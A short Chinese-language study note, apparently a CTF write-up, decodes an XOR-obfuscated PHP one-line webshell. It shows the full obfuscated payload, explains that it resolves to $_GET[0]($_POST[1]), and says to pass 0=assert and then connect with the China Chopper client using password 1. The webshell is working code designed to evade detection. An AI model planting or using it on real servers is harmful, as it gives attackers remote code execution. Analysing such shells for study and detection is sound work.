变形的一句话木马
下图是一个解析的东西:这是个一句话木马的变形通过异或运算来规避所有的敏感函数。。。
<?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");${$__}[!$_](${$___}[$_]); ?>
下面是解题思路留下做个笔记一遍日后查看
首先发现是php源码
一开始不知道什么意思,看了一下百度后才发现原来是求出$_、$__、$___这三个值,用echo打印可以看到这三个分别为1、_GET、_POST,放入最后一条语句中刚好组成一个一句话病毒
<?php $_GET[0]($_POST[1])?>
首先整理下代码
这里面的异或运算过程如下
其实这是一句话木马的变种,整理下:
$_原来的值为0,经过$_++,变成1
将字符的异或进行计算,解得$__=_GET,$___=_POST
而$_布尔值为True,!$_则为False,值为0
整理${$__}[!$_](${$___}[$_]);得到 $_GET[0]($_POST[1]),是不是很眼熟,这其实就是一句话木马
提交参数0=assert,代码就变成了 <?php assert($_POST[1]); ?>
因此直接上菜刀,密码为1
发明这个的人真是牛逼!!!!小白的感叹。。。。。